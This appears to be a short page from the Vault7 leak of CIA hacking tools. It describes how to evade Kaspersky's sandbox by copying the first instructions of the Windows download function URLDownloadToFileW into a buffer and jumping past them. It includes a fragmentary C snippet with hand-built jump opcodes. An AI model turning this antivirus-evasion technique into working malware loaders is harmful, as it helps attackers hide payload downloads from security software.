Vault7: CIA Hacking Tools Revealed
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API Memcpy
Kaspersky's sandbox environment has been known to have gaps in what it emulates when examining a process. One such example was found while testing a technique found in known-malware. The technique involved copying the first few assembly instructions of target Windows APIApplication Programming Interface functions to an executable buffer, then calling a jmp command after executing the copied instructions which
would jmp to the rest of the APIApplication Programming Interface code. For example
DWORD dwOldProtect;
HMODULE urlmon = LoadLibrary(L"Urlmon.dll");
BYTE* func = (BYTE*)GetProcAddress(urlmon, "URLDownloadToFileW");
memcpy(urlcode, func, 6); //Apparently this line causes Kasp to mess up
lpUrlAddr += 6;
//make jump to lpUrlAddr, copy to urlcode. call urlcode
BYTE jump[8] = {0};
jump[0] = 0x68; //push address to jump to
memcpy((jump+1), &lpUrlAddr, 4);
jump[5] = 0x58; //pop address into EAX
jump[6] = 0xff; //jmp eax
jump[7] = 0xe0;